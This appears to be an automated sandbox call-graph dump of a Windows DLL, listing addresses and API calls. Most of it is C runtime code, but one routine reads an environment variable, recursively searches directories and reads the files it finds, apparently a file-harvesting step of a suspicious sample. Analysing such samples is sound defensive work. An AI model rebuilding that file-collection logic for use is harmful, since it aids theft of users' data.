_free 19 API calls 7809->7812 7811 100062bc _abort 11 API calls 7810->7811 7813 10004fff 7811->7813 7812->7809 6984 10002418 6985 10002420 ___scrt_release_startup_lock 6984->6985 6988 100047f5 6985->6988 6987 10002448 6989 10004804 6988->6989 6990 10004808 6988->6990 6989->6987 6993 10004815 6990->6993 6994 10005b7a __dosmaperr 19 API calls 6993->6994 6997 1000482c 6994->6997 6995 10002ada _ValidateLocalCookies 5 API calls 6996 10004811 6995->6996 6996->6987 6997->6995 7645 10004a9a 7648 10005411 7645->7648 7649 1000541d _abort 7648->7649 7650 10005af6 _abort 36 API calls 7649->7650 7653 10005422 7650->7653 7651 100055a8 _abort 36 API calls 7652 1000544c 7651->7652 7653->7651 6515 10001c5b 6516 10001c6b ___scrt_fastfail 6515->6516 6519 100012ee 6516->6519 6518 10001c87 6520 10001324 ___scrt_fastfail 6519->6520 6521 100013b7 GetEnvironmentVariableW 6520->6521 6545 100010f1 6521->6545 6524 100010f1 51 API calls 6525 10001465 6524->6525 6526 100010f1 51 API calls 6525->6526 6527 10001479 6526->6527 6528 100010f1 51 API calls 6527->6528 6529 1000148d 6528->6529 6530 100010f1 51 API calls 6529->6530 6531 100014a1 6530->6531 6532 100010f1 51 API calls 6531->6532 6533 100014b5 lstrlenW 6532->6533 6534 100014d9 lstrlenW 6533->6534 6544 100014d2 6533->6544 6535 100010f1 51 API calls 6534->6535 6536 10001501 lstrlenW lstrcatW 6535->6536 6537 100010f1 51 API calls 6536->6537 6538 10001539 lstrlenW lstrcatW 6537->6538 6539 100010f1 51 API calls 6538->6539 6540 1000156b lstrlenW lstrcatW 6539->6540 6541 100010f1 51 API calls 6540->6541 6542 1000159d lstrlenW lstrcatW 6541->6542 6543 100010f1 51 API calls 6542->6543 6543->6544 6544->6518 6546 10001118 ___scrt_fastfail 6545->6546 6547 10001129 lstrlenW 6546->6547 6558 10002c40 6547->6558 6549 10001148 lstrcatW lstrlenW 6550 10001177 lstrlenW FindFirstFileW 6549->6550 6551 10001168 lstrlenW 6549->6551 6552 100011a0 6550->6552 6553 100011e1 6550->6553 6551->6550 6554 100011c7 FindNextFileW 6552->6554 6555 100011aa 6552->6555 6553->6524 6554->6552 6557 100011da FindClose 6554->6557 6555->6554 6560 10001000 6555->6560 6557->6553 6559 10002c57 6558->6559 6559->6549 6559->6559 6561 10001022 ___scrt_fastfail 6560->6561 6562 100010af 6561->6562 6563 1000102f lstrcatW lstrlenW 6561->6563 6566 100010b5 lstrlenW 6562->6566 6576 100010ad 6562->6576 6564 1000105a lstrlenW 6563->6564 6565 1000106b lstrlenW 6563->6565 6564->6565 6577 10001e89 lstrlenW 6565->6577 6591 10001e16 6566->6591 6569 10001088 GetFileAttributesW 6572 1000109c 6569->6572 6569->6576 6570 100010ca 6571 10001e89 5 API calls 6570->6571 6570->6576 6573 100010df 6571->6573 6572->6576 6583 1000173a 6572->6583 6596 100011ea 6573->6596 6576->6555 6578 10002c40 ___scrt_fastfail 6577->6578 6579 10001ea7 lstrcatW lstrlenW 6578->6579 6580 10001ed1 lstrcatW 6579->6580 6581 10001ec2 6579->6581 6580->6569 6581->6580 6582 10001ec7 lstrlenW 6581->6582 6582->6580 6584 10001747 ___scrt_fastfail 6583->6584 6611 10001cca 6584->6611 6588 1000199f 6588->6576 6589 10001824 ___scrt_fastfail _strlen 6589->6588 6629 100015da 6589->6629 6592 10001e29 6591->6592 6595 10001e4c 6591->6595 6593 10001e2d lstrlenW 6592->6593 6592->6595 6594 10001e3f lstrlenW 6593->6594 6593->6595 6594->6595 6595->6570 6597 1000120e ___scrt_fastfail 6596->6597 6598 10001e89 5 API calls 6597->6598 6599 10001220 GetFileAttributesW 6598->6599 6600 10001235 6599->6600 6601 10001246 6599->6601 6600->6601 6603 1000173a 29 API calls 6600->6603 6602 10001e89 5 API calls 6601->6602 6604 10001258 6602->6604 6603->6601 6605 100010f1 50 API calls 6604->6605 6606 1000126d 6605->6606 6607 10001e89 5 API calls 6606->6607 6608 1000127f ___scrt_fastfail 6607->6608 6609 100010f1 50 API calls 6608->6609 6610 100012e6 6609->6610 6610->6576 6612 10001cf1 ___scrt_fastfail 6611->6612 6613 10001d55 GetFileSize 6612->6613 6618 10001808 6612->6618 6614 10001ede 21 API calls 6613->6614 6615 10001d66 ReadFile 6614->6615 6616 10001d94 CloseHandle 6615->6616 6617 10001d7d CloseHandle 6615->6617 6616->6618 6617->6618 6618->6588 6619 10001ede 6618->6619 6621 1000222f 6619->6621 6622 1000224e 6621->6622 6623 1000474f _abort 7 API calls 6621->6623 6624 10002250 6621->6624 6637 100047e5 6621->6637 6622->6589 6623->6621 6628 10002908 6624->6628 6644 100035d2 6624->6644 6625 100035d2 __CxxThrowException@8 RaiseException 6627 10002925 6625->6627 6627->6589 6628->6625 6630 1000160c _strcat _strlen 6629->6630 6631 1000163c lstrlenW 6630->6631 6647 10001c9d 6631->6647 6633 10001655 lstrcatW lstrlenW 6634 10001678 6633->6634 6635 10001693 ___scrt_fastfail 6634->6635 6636 1000167e lstrcatW 6634->6636 6635->6589 6636->6635 6642 100056d0 _abort 6637->6642 6638 1000570e 6639 10006368 _free 19 API calls 6638->6639 6641 1000570c 6639->6641 6640 100056f9 RtlAllocateHeap 6640->6641 6640->6642 6641->6621 6642->6638 6642->6640 6643 1000474f _abort 7 API calls 6642->6643 6643->6642 6646 100035f2 RaiseException 6644->6646 6646->6628 6648 10001ca6 _strlen 6647->6648 6648->6633 6649 100020db 6650 100020e7 ___DestructExceptionObject 6649->6650 6651 10002110 dllmain_raw 6650->6651 6655 1000210b 6650->6655 6660 100020f6 6650->6660 6652 1000212a 6651->6652 6651->6660 6662 10001eec 6652->6662 6654 10002177 6656 10001eec 29 API calls 6654->6656 6654->6660 6655->6654 6658 10001eec 29 API calls 6655->6658 6655->6660 6657 1000218a 6656->6657 6659 10002193 dllmain_raw 6657->6659 6657->6660 6661 1000216d dllmain_raw 6658->6661 6659->6660 6661->6654 6663 10001ef7 6662->6663 6664 10001f2a dllmain_crt_process_detach 6662->6664 6665 10001f1c dllmain_crt_process_attach 6663->6665 6666 10001efc 6663->6666 6671 10001f06 6664->6671 6665->6671 6667 10001f01 6666->6667 6668 10001f12 6666->6668 6667->6671 6672 1000240b 6667->6672 6677 100023ec 6668->6677 6671->6655 6685 100053e5 6672->6685 6790 10003513 6677->6790 6680 100023f5 6680->6671 6683 10002408 6683->6671 6684 1000351e 6 API calls 6684->6680 6691 10005aca 6685->6691 6688 1000351e 6763 10003820 6688->6763 6690 10002415 6690->6671 6692 10005ad4 6691->6692 6693 10002410 6691->6693 6694 10005e08 _abort 10 API calls 6692->6694 6693->6688 6695 10005adb 6694->6695 6695->6693 6696 10005e5e _abort 10 API calls 6695->6696 6697 10005aee 6696->6697 6699 100059b5 6697->6699 6700 100059c0 6699->6700 6701 100059d0 6699->6701 6705 100059d6 6700->6705 6701->6693 6704 1000571e _free 19 API calls 6704->6701 6706 100059ef 6705->6706 6707 100059e9 6705->6707 6709 1000571e _free 19 API calls 6706->6709 6708 1000571e _free 19 API calls 6707->6708 6708->6706 6710 100059fb 6709->6710 6711 1000571e _free 19 API calls 6710->6711 6712 10005a06 6711->6712 6713 1000571e _free 19 API calls 6712->6713 6714 10005a11 6713->6714 6715 1000571e _free 19 API calls 6714->6715 6716 10005a1c 6715->6716 6717 1000571e _free 19 API calls 6716->6717 6718 10005a27 6717->6718 6719 1000571e _free 19 API calls 6718->6719 6720 10005a32 6719->6720 6721 1000571e _free 19 API calls 6720->6721 6722 10005a3d 6721->6722 6723 1000571e _free 19 API calls 6722->6723 6724 10005a48 6723->6724 6725 1000571e _free 19 API calls 6724->6725 6726 10005a56 6725->6726 6731 1000589c 6726->6731 6737 100057a8 6731->6737 6733 100058c0 6734 100058ec 6733->6734 6750 10005809 6734->6750 6736 10005910 6736->6704 6738 100057b4 ___DestructExceptionObject 6737->6738 6745 10005671 RtlEnterCriticalSection 6738->6745 6740 100057be 6743 1000571e _free 19 API calls 6740->6743 6744 100057e8 6740->6744 6742 100057f5 _abort 6742->6733 6743->6744 6746 100057fd 6744->6746 6745->6740 6749 100056b9 RtlLeaveCriticalSection 6746->6749 6748 10005807 6748->6742 6749->6748 6751 10005815 ___DestructExceptionObject 6750->6751 6758 10005671 RtlEnterCriticalSection 6751->6758 6753 1000581f 6754 10005a7f _abort 19 API calls 6753->6754 6755 10005832 6754->6755 6759 10005848 6755->6759 6757 10005840 _abort 6757->6736 6758->6753 6762 100056b9 RtlLeaveCriticalSection 6759->6762 6761 10005852 6761->6757 6762->6761 6764 1000382d 6763->6764 6768 1000384b ___vcrt_freefls@4 6763->6768 6765 1000383b 6764->6765 6769 10003b67 6764->6769 6774 10003ba2 6765->6774 6768->6690 6779 10003a82 6769->6779 6771 10003b81 6772 10003b99 TlsGetValue 6771->6772 6773 10003b8d 6771->6773 6772->6773 6773->6765 6775 10003a82 try_get_function 4 API calls 6774->6775 6776 10003bbc 6775->6776 6777 10003bd7 TlsSetValue 6776->6777 6778 10003bcb 6776->6778 6777->6778 6778->6768 6780 10003aaa 6779->6780 6782 10003aa6 __crt_fast_encode_pointer 6779->6782 6780->6782 6783 100039be 6780->6783 6782->6771 6788 100039cd try_get_first_available_module 6783->6788 6784 10003a77 6784->6782 6785 100039ea LoadLibraryExW 6786 10003a05 GetLastError 6785->6786 6785->6788 6786->6788 6787 10003a60 FreeLibrary 6787->6788 6788->6784 6788->6785 6788->6787 6789 10003a38 LoadLibraryExW 6788->6789 6789->6788 6796 10003856 6790->6796 6792 100023f1 6792->6680 6793 100053da 6792->6793 6794 10005b7a __dosmaperr 19 API calls 6793->6794 6795 100023fd 6794->6795 6795->6683 6795->6684 6797 10003862 GetLastError 6796->6797 6798 1000385f 6796->6798 6799 10003b67 ___vcrt_FlsGetValue 5 API calls 6797->6799 6798->6792 6800 10003877 6799->6800 6801 100038dc SetLastError 6800->6801 6802 10003ba2 ___vcrt_FlsSetValue 5 API calls 6800->6802 6807 10003896 6800->6807 6801->6792 6803 10003890 6802->6803 6804 100038b8 6803->6804 6805 10003ba2 ___vcrt_FlsSetValue 5 API calls 6803->6805 6803->6807 6806 10003ba2 ___vcrt_FlsSetValue 5 API calls 6804->6806 6804->6807 6805->6804 6806->6807 6807->6801 6998 1000281c 7001 10002882 6998->7001 7004 10003550 7001->7004 7003 1000282a 7005 1000355d 7004->7005 7008 1000358a 7004->7008 7006 100047e5 ___std_exception_copy 20 API calls 7005->7006 7005->7008 7007 1000357a 7006->7007 7007->7008 7010 1000544d 7007->7010 7008->7003 7011 1000545a 7010->7011 7012 10005468 7010->7012 7011->7012 7017 1000547f 7011->7017 7013 10006368 _free 19 API calls 7012->7013 7014 10005470 7013->7014 7015 100062ac _abort 25 API calls 7014->7015 7016 1000547a 7015->7016 7016->7008 7017->7016 7018 10006368 _free 19 API calls 7017->7018 7018->7014 7814 10004bdd 7815 10004c08 7814->7815 7816 10004bec 7814->7816 7817 10006d60 49 API calls 7815->7817 7816->7815 7818 10004bf2 7816->7818 7820 10004c0f GetModuleFileNameA 7817->7820 7819 10006368 _free 19 API calls 7818->7819 7821 10004bf7 7819->7821 7822 10004c33 7820->7822 7823 100062ac _abort 25 API calls 7821->7823 7837 10004d01 7822->7837 7824 10004c01 7823->7824 7829 10004c72 7831 10004d01 36 API calls 7829->7831 7830 10004c66 7832 10006368 _free 19 API calls 7830->7832 7835 10004c88 7831->7835 7833 10004c6b 7832->7833 7834 1000571e _free 19 API calls 7833->7834 7834->7824 7835->7833 7836 1000571e _free 19 API calls 7835->7836 7836->7833 7839 10004d26 7837->7839 7841 10004d86 7839->7841 7849 100070eb 7839->7849 7840 10004c50 7843 10004e76 7840->7843 7841->7840 7842 100070eb 36 API calls 7841->7842 7842->7841 7844 10004e8b 7843->7844 7845 10004c5d 7843->7845 7844->7845 7846 1000637b _abort 19 API calls 7844->7846 7845->7829 7845->7830 7847 10004eb9 7846->7847 7848 1000571e _free 19 API calls 7847->7848 7848->7845 7852 10007092 7849->7852 7853 100054a7 __fassign 36 API calls 7852->7853 7854 100070a6 7853->7854 7854->7839 5846 10006d60 5847 10006d69 5846->5847 5848 10006d72 5846->5848 5850 10006c5f 5847->5850 5870 10005af6 GetLastError 5850->5870 5852 10006c6c 5890 10006d7e 5852->5890 5854 10006c74 5899 100069f3 5854->5899 5857 10006c8b 5857->5848 5860 10006cce 5926 1000571e 5860->5926 5864 10006cc9 5923 10006368 5864->5923 5866 10006d12 5866->5860 5932 100068c9 5866->5932 5867 10006ce6 5867->5866 5868 1000571e _free 19 API calls 5867->5868 5868->5866 5871 10005b12 5870->5871 5872 10005b0c 5870->5872 5876 10005b61 SetLastError 5871->5876 5942 1000637b 5871->5942 5935 10005e08 5872->5935 5876->5852 5879 1000571e _free 19 API calls 5882 10005b32 5879->5882 5880 10005b2c 5880->5879 5881 10005b48 5956 1000593c 5881->5956 5884 10005b6d SetLastError 5882->5884 5961 100055a8 5884->5961 5887 1000571e _free 19 API calls 5889 10005b5a 5887->5889 5889->5876 5889->5884 5891 10006d8a ___DestructExceptionObject 5890->5891 5892 10005af6 _abort 36 API calls 5891->5892 5894 10006d94 5892->5894 5895 10006e18 _abort 5894->5895 5896 100055a8 _abort 36 API calls 5894->5896 5898 1000571e _free 19 API calls 5894->5898 6336 10005671 RtlEnterCriticalSection 5894->6336 6337 10006e0f 5894->6337 5895->5854 5896->5894 5898->5894 6341 100054a7 5899->6341 5902 10006a14 GetOEMCP 5904 10006a3d 5902->5904 5903 10006a26 5903->5904 5905 10006a2b GetACP 5903->5905 5904->5857 5906 100056d0 5904->5906 5905->5904 5907 1000570e 5906->5907 5911 100056de _abort 5906->5911 5908 10006368 _free 19 API calls 5907->5908 5910 1000570c 5908->5910 5909 100056f9 RtlAllocateHeap 5909->5910 5909->5911 5910->5860 5913 10006e20 5910->5913 5911->5907 5911->5909 5912 1000474f _abort 7 API calls 5911->5912 5912->5911 5914 100069f3 38 API calls 5913->5914 5915 10006e3f 5914->5915 5918 10006e90 IsValidCodePage 5915->5918 5920 10006e46 5915->5920 5922 10006eb5 ___scrt_fastfail 5915->5922 5916 10002ada _ValidateLocalCookies 5 API calls 5917 10006cc1 5916->5917 5917->5864 5917->5867 5919 10006ea2 GetCPInfo 5918->5919 5918->5920 5919->5920 5919->5922 5920->5916 6378 10006acb GetCPInfo 5922->6378 5924 10005b7a __dosmaperr 19 API calls 5923->5924 5925 1000636d 5924->5925 5925->5860 5927 10005752 _free 5926->5927 5928 10005729 HeapFree 5926->5928 5927->5857 5928->5927 5929 1000573e 5928->5929 5930 10006368 _free 17 API calls 5929->5930 5931 10005744 GetLastError 5930->5931 5931->5927 6451 10006886 5932->6451 5934 100068ed 5934->5860 5972 10005c45 5935->5972 5937 10005e2f 5938 10005e47 TlsGetValue 5937->5938 5941 10005e3b 5937->5941 5938->5941 5940 10005e58 5940->5871 5976 10002ada 5941->5976 5947 10006388 _abort 5942->5947 5943 100063c8 5946 10006368 _free 18 API calls 5943->5946 5944 100063b3 RtlAllocateHeap 5945 10005b24 5944->5945 5944->5947 5945->5880 5949 10005e5e 5945->5949 5946->5945 5947->5943 5947->5944 5991 1000474f 5947->5991 5950 10005c45 _abort 4 API calls 5949->5950 5951 10005e85 5950->5951 5952 10005ea0 TlsSetValue 5951->5952 5953 10005e94 5951->5953 5952->5953 5954 10002ada _ValidateLocalCookies 5 API calls 5953->5954 5955 10005b41 5954->5955 5955->5880 5955->5881 6007 10005914 5956->6007 6155 10007613 5961->6155 5964 100055b8 5966 100055c2 IsProcessorFeaturePresent 5964->5966 5967 100055e0 5964->5967 5969 100055cd 5966->5969 6191 10004bc1 5967->6191 6185 100060e2 5969->6185 5974 10005c71 5972->5974 5975 10005c75 __crt_fast_encode_pointer 5972->5975 5974->5975 5983 10005ce1 5974->5983 5975->5937 5977 10002ae3 5976->5977 5978 10002ae5 IsProcessorFeaturePresent 5976->5978 5977->5940 5980 10002b58 5978->5980 5990 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5980->5990 5982 10002c3b 5982->5940 5984 10005d02 LoadLibraryExW 5983->5984 5989 10005cf7 5983->5989 5985 10005d1f GetLastError 5984->5985 5988 10005d37 5984->5988 5986 10005d2a LoadLibraryExW 5985->5986 5985->5988 5986->5988 5987 10005d4e FreeLibrary 5987->5989 5988->5987 5988->5989 5989->5974 5990->5982 5996 10004793 5991->5996 5993 10004765 5994 10002ada _ValidateLocalCookies 5 API calls 5993->5994 5995 1000478f 5994->5995 5995->5947 5997 1000479f ___DestructExceptionObject 5996->5997 6002 10005671 RtlEnterCriticalSection 5997->6002 5999 100047aa 6003 100047dc 5999->6003 6001 100047d1 _abort 6001->5993 6002->5999 6006 100056b9 RtlLeaveCriticalSection 6003->6006 6005 100047e3 6005->6001 6006->6005 6013 10005854 6007->6013 6009 10005938 6010 100058c4 6009->6010 6024 10005758 6010->6024 6012 100058e8 6012->5887 6014 10005860 ___DestructExceptionObject 6013->6014 6019 10005671 RtlEnterCriticalSection 6014->6019 6016 1000586a 6020 10005890 6016->6020 6018 10005888 _abort 6018->6009 6019->6016 6023 100056b9 RtlLeaveCriticalSection 6020->6023 6022 1000589a 6022->6018 6023->6022 6025 10005764 ___DestructExceptionObject 6024->6025 6032 10005671 RtlEnterCriticalSection 6025->6032 6027 1000576e 6033 10005a7f 6027->6033 6029 10005786 6037 1000579c 6029->6037 6031 10005794 _abort 6031->6012 6032->6027 6034 10005ab5 __fassign 6033->6034 6035 10005a8e __fassign 6033->6035 6034->6029 6035->6034 6040 10007cc2 6035->6040 6154 100056b9 RtlLeaveCriticalSection 6037->6154 6039 100057a6 6039->6031 6041 10007d42 6040->6041 6045 10007cd8 6040->6045 6042 10007d90 6041->6042 6044 1000571e _free 19 API calls 6041->6044 6108 10007e35 6042->6108 6046 10007d64 6044->6046 6045->6041 6047 10007d0b 6045->6047 6052 1000571e _free 19 API calls 6045->6052 6048 1000571e _free 19 API calls 6046->6048 6049 10007d2d 6047->6049 6054 1000571e _free 19 API calls 6047->6054 6050 10007d77 6048->6050 6051 1000571e _free 19 API calls 6049->6051 6053 1000571e _free 19 API calls 6050->6053 6055 10007d37 6051->6055 6057 10007d00 6052->6057 6060 10007d85 6053->6060 6061 10007d22 6054->6061 6062 1000571e _free 19 API calls 6055->6062 6056 10007dfe 6063 1000571e _free 19 API calls 6056->6063 6068 100090ba 6057->6068 6058 10007d9e 6058->6056 6066 1000571e 19 API calls _free 6058->6066 6064 1000571e _free 19 API calls 6060->6064 6096 100091b8 6061->6096 6062->6041 6067 10007e04 6063->6067 6064->6042 6066->6058 6067->6034 6069 100090cb 6068->6069 6095 100091b4 6068->6095 6070 100090dc 6069->6070 6072 1000571e _free 19 API calls 6069->6072 6071 100090ee 6070->6071 6073 1000571e _free 19 API calls 6070->6073 6074 10009100 6071->6074 6075 1000571e _free 19 API calls 6071->6075 6072->6070 6073->6071 6076 10009112 6074->6076 6077 1000571e _free 19 API calls 6074->6077 6075->6074 6078 10009124 6076->6078 6080 1000571e _free 19 API calls 6076->6080 6077->6076 6079 10009136 6078->6079 6081 1000571e _free 19 API calls 6078->6081 6082 10009148 6079->6082 6083 1000571e _free 19 API calls 6079->6083 6080->6078 6081->6079 6084 1000571e _free 19 API calls 6082->6084 6087 1000915a 6082->6087 6083->6082 6084->6087 6085 1000916c 6086 1000917e 6085->6086 6089 1000571e _free 19 API calls 6085->6089 6090 10009190 6086->6090 6091 1000571e _free 19 API calls 6086->6091 6087->6085 6088 1000571e _free 19 API calls 6087->6088 6088->6085 6089->6086 6092 100091a2 6090->6092 6093 1000571e _free 19 API calls 6090->6093 6091->6090 6094 1000571e _free 19 API calls 6092->6094 6092->6095 6093->6092 6094->6095 6095->6047 6097 100091c5 6096->6097 6098 1000921d 6096->6098 6099 100091d5 6097->6099 6100 1000571e _free 19 API calls 6097->6100 6098->6049 6101 100091e7 6099->6101 6102 1000571e _free 19 API calls 6099->6102 6100->6099 6103 100091f9 6101->6103 6104 1000571e _free 19 API calls 6101->6104 6102->6101 6105 1000920b 6103->6105 6106 1000571e _free 19 API calls 6103->6106 6104->6103 6105->6098 6107 1000571e _free 19 API calls 6105->6107 6106->6105 6107->6098 6109 10007e60 6108->6109 6110 10007e42 6108->6110 6109->6058 6110->6109 6114 1000925d 6110->6114 6113 1000571e _free 19 API calls 6113->6109 6115 10007e5a 6114->6115 6116 1000926e 6114->6116 6115->6113 6150 10009221 6116->6150 6119 10009221 __fassign 19 API calls 6120 10009281 6119->6120 6121 10009221 __fassign 19 API calls 6120->6121 6122 1000928c 6121->6122 6123 10009221 __fassign 19 API calls 6122->6123 6124 10009297 6123->6124 6125 10009221 __fassign 19 API calls 6124->6125 6126 100092a5 6125->6126 6127 1000571e _free 19 API calls 6126->6127 6128 100092b0 6127->6128 6129 1000571e _free 19 API calls 6128->6129 6130 100092bb 6129->6130 6131 1000571e _free 19 API calls 6130->6131 6132 100092c6 6131->6132 6133 10009221 __fassign 19 API calls 6132->6133 6134 100092d4 6133->6134 6135 10009221 __fassign 19 API calls 6134->6135 6136 100092e2 6135->6136 6137 10009221 __fassign 19 API calls 6136->6137 6138 100092f3 6137->6138 6139 10009221 __fassign 19 API calls 6138->6139 6140 10009301 6139->6140 6141 10009221 __fassign 19 API calls 6140->6141 6142 1000930f 6141->6142 6143 1000571e _free 19 API calls 6142->6143 6144 1000931a 6143->6144 6145 1000571e _free 19 API calls 6144->6145 6146 10009325 6145->6146 6147 1000571e _free 19 API calls 6146->6147 6148 10009330 6147->6148 6149 1000571e _free 19 API calls 6148->6149 6149->6115 6151 10009258 6150->6151 6153 10009248 6150->6153 6151->6119 6152 1000571e _free 19 API calls 6152->6153 6153->6151 6153->6152 6154->6039 6194 10007581 6155->6194 6158 1000766e 6159 1000767a _abort 6158->6159 6163 100076a7 _abort 6159->6163 6166 100076a1 _abort 6159->6166 6208 10005b7a GetLastError 6159->6208 6161 100076f3 6162 10006368 _free 19 API calls 6161->6162 6164 100076f8 6162->6164 6170 1000771f 6163->6170 6230 10005671 RtlEnterCriticalSection 6163->6230 6227 100062ac 6164->6227 6166->6161 6166->6163 6184 100076d6 6166->6184 6171 1000777e 6170->6171 6173 10007776 6170->6173 6181 100077a9 6170->6181 6231 100056b9 RtlLeaveCriticalSection 6170->6231 6171->6181 6232 10007665 6171->6232 6176 10004bc1 _abort 26 API calls 6173->6176 6176->6171 6178 10005af6 _abort 36 API calls 6182 1000780c 6178->6182 6180 10007665 _abort 36 API calls 6180->6181 6235 1000782e 6181->6235 6183 10005af6 _abort 36 API calls 6182->6183 6182->6184 6183->6184 6239 1000bdc9 6184->6239 6186 100060fe ___scrt_fastfail 6185->6186 6187 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6186->6187 6189 100061fb ___scrt_fastfail 6187->6189 6188 10002ada _ValidateLocalCookies 5 API calls 6190 10006219 6188->6190 6189->6188 6190->5967 6258 1000499b 6191->6258 6197 10007527 6194->6197 6196 100055ad 6196->5964 6196->6158 6198 10007533 ___DestructExceptionObject 6197->6198 6203 10005671 RtlEnterCriticalSection 6198->6203 6200 10007541 6204 10007575 6200->6204 6202 10007568 _abort 6202->6196 6203->6200 6207 100056b9 RtlLeaveCriticalSection 6204->6207 6206 1000757f 6206->6202 6207->6206 6209 10005b93 6208->6209 6210 10005b99 6208->6210 6211 10005e08 _abort 10 API calls 6209->6211 6212 1000637b _abort 16 API calls 6210->6212 6214 10005bf0 SetLastError 6210->6214 6211->6210 6213 10005bab 6212->6213 6216 10005e5e _abort 10 API calls 6213->6216 6219 10005bb3 6213->6219 6215 10005bf9 6214->6215 6215->6166 6217 10005bc8 6216->6217 6217->6219 6220 10005bcf 6217->6220 6218 1000571e _free 16 API calls 6221 10005bb9 6218->6221 6219->6218 6222 1000593c _abort 16 API calls 6220->6222 6223 10005be7 SetLastError 6221->6223 6224 10005bda 6222->6224 6223->6215 6225 1000571e _free 16 API calls 6224->6225 6226 10005be0 6225->6226 6226->6214 6226->6223 6242 10006231 6227->6242 6229 100062b8 6229->6184 6230->6170 6231->6173 6233 10005af6 _abort 36 API calls 6232->6233 6234 1000766a 6233->6234 6234->6180 6236 10007834 6235->6236 6237 100077fd 6235->6237 6257 100056b9 RtlLeaveCriticalSection 6236->6257 6237->6178 6237->6182 6237->6184 6240 10002ada _ValidateLocalCookies 5 API calls 6239->6240 6241 1000bdd4 6240->6241 6241->6241 6243 10005b7a __dosmaperr 19 API calls 6242->6243 6244 10006247 6243->6244 6245 100062a6 6244->6245 6248 10006255 6244->6248 6253 100062bc IsProcessorFeaturePresent 6245->6253 6247 100062ab 6249 10006231 _abort 25 API calls 6247->6249 6251 10002ada _ValidateLocalCookies 5 API calls 6248->6251 6250 100062b8 6249->6250 6250->6229 6252 1000627c 6251->6252 6252->6229 6254 100062c7 6253->6254 6255 100060e2 _abort 8 API calls 6254->6255 6256 100062dc GetCurrentProcess TerminateProcess 6255->6256 6256->6247 6257->6237 6259 100049a7 _abort 6258->6259 6260 100049bf 6259->6260 6280 10004af5 GetModuleHandleW 6259->6280 6288 10005671 RtlEnterCriticalSection 6260->6288 6264 10004a65 6296 10004aa5 6264->6296 6268 10004a3c 6269 10004a54 6268->6269 6292 10004669 6268->6292 6276 10004669 _abort 5 API calls 6269->6276 6270 100049c7 6270->6264 6270->6268 6289 1000527a 6270->6289 6271 10004a82 6299 10004ab4 6271->6299 6272 10004aae 6274 1000bdc9 _abort 5 API calls 6272->6274 6278 10004ab3 6274->6278 6276->6264 6281 100049b3 6280->6281 6281->6260 6282 10004b39 GetModuleHandleExW 6281->6282 6287 10004b63 6282->6287 6283 10004b95 6285 10002ada _ValidateLocalCookies 5 API calls 6283->6285 6284 10004b8c FreeLibrary 6284->6283 6286 10004b9f 6285->6286 6286->6260 6287->6283 6287->6284 6288->6270 6307 10005132 6289->6307 6295 10004698 6292->6295 6293 10002ada _ValidateLocalCookies 5 API calls 6294 100046c1 6293->6294 6294->6269 6295->6293 6329 100056b9 RtlLeaveCriticalSection 6296->6329 6298 10004a7e 6298->6271 6298->6272 6330 10006025 6299->6330 6302 10004ae2 6305 10004b39 _abort 7 API calls 6302->6305 6303 10004ac2 GetPEB 6303->6302 6304 10004ad2 GetCurrentProcess TerminateProcess 6303->6304 6304->6302 6306 10004aea ExitProcess 6305->6306 6310 100050e1 6307->6310 6309 10005156 6309->6268 6311 100050ed ___DestructExceptionObject 6310->6311 6318 10005671 RtlEnterCriticalSection 6311->6318 6313 100050fb 6319 1000515a 6313->6319 6317 10005119 _abort 6317->6309 6318->6313 6322 10005182 6319->6322 6323 1000517a 6319->6323 6320 10002ada _ValidateLocalCookies 5 API calls 6321 10005108 6320->6321 6325 10005126 6321->6325 6322->6323 6324 1000571e _free 19 API calls 6322->6324 6323->6320 6324->6323 6328 100056b9 RtlLeaveCriticalSection 6325->6328 6327 10005130 6327->6317 6328->6327 6329->6298 6331 1000604a 6330->6331 6335 10006040 6330->6335 6332 10005c45 _abort 4 API calls 6331->6332 6332->6335 6333 10002ada _ValidateLocalCookies 5 API calls 6334 10004abe 6333->6334 6334->6302 6334->6303 6335->6333 6336->5894 6340 100056b9 RtlLeaveCriticalSection 6337->6340 6339 10006e16 6339->5894 6340->6339 6342 100054c4 6341->6342 6348 100054ba 6341->6348 6343 10005af6 _abort 36 API calls 6342->6343 6342->6348 6344 100054e5 6343->6344 6349 10007a00 6344->6349 6348->5902 6348->5903 6350 10007a13 6349->6350 6352 100054fe 6349->6352 6350->6352 6357 10007f0f 6350->6357 6353 10007a2d 6352->6353 6354 10007a40 6353->6354 6356 10007a55 6353->6356 6355 10006d7e __fassign 36 API calls 6354->6355 6354->6356 6355->6356 6356->6348 6358 10007f1b ___DestructExceptionObject 6357->6358 6359 10005af6 _abort 36 API calls 6358->6359 6360 10007f24 6359->6360 6361 10007f72 _abort 6360->6361 6369 10005671 RtlEnterCriticalSection 6360->6369 6361->6352 6363 10007f42 6370 10007f86 6363->6370 6368 100055a8 _abort 36 API calls 6368->6361 6369->6363 6371 10007f94 __fassign 6370->6371 6373 10007f56 6370->6373 6372 10007cc2 __fassign 19 API calls 6371->6372 6371->6373 6372->6373 6374 10007f75 6373->6374 6377 100056b9 RtlLeaveCriticalSection 6374->6377 6376 10007f69 6376->6361 6376->6368 6377->6376 6379 10006b05 6378->6379 6380 10006baf 6378->6380 6388 100086e4 6379->6388 6383 10002ada _ValidateLocalCookies 5 API calls 6380->6383 6385 10006c5b 6383->6385 6385->5920 6387 10008a3e 41 API calls 6387->6380 6389 100054a7 __fassign 36 API calls 6388->6389 6390 10008704 MultiByteToWideChar 6389->6390 6392 10008742 6390->6392 6398 100087da 6390->6398 6394 100056d0 20 API calls 6392->6394 6399 10008763 ___scrt_fastfail 6392->6399 6393 10002ada _ValidateLocalCookies 5 API calls 6395 10006b66 6393->6395 6394->6399 6402 10008a3e 6395->6402 6396 100087d4 6407 10008801 6396->6407 6398->6393 6399->6396 6400 100087a8 MultiByteToWideChar 6399->6400 6400->6396 6401 100087c4 GetStringTypeW 6400->6401 6401->6396 6403 100054a7 __fassign 36 API calls 6402->6403 6404 10008a51 6403->6404 6411 10008821 6404->6411 6408 1000880d 6407->6408 6409 1000881e 6407->6409 6408->6409 6410 1000571e _free 19 API calls 6408->6410 6409->6398 6410->6409 6412 1000883c 6411->6412 6413 10008862 MultiByteToWideChar 6412->6413 6414 10008a16 6413->6414 6415 1000888c 6413->6415 6416 10002ada _ValidateLocalCookies 5 API calls 6414->6416 6420 100056d0 20 API calls 6415->6420 6422 100088ad 6415->6422 6417 10006b87 6416->6417 6417->6387 6418 100088f6 MultiByteToWideChar 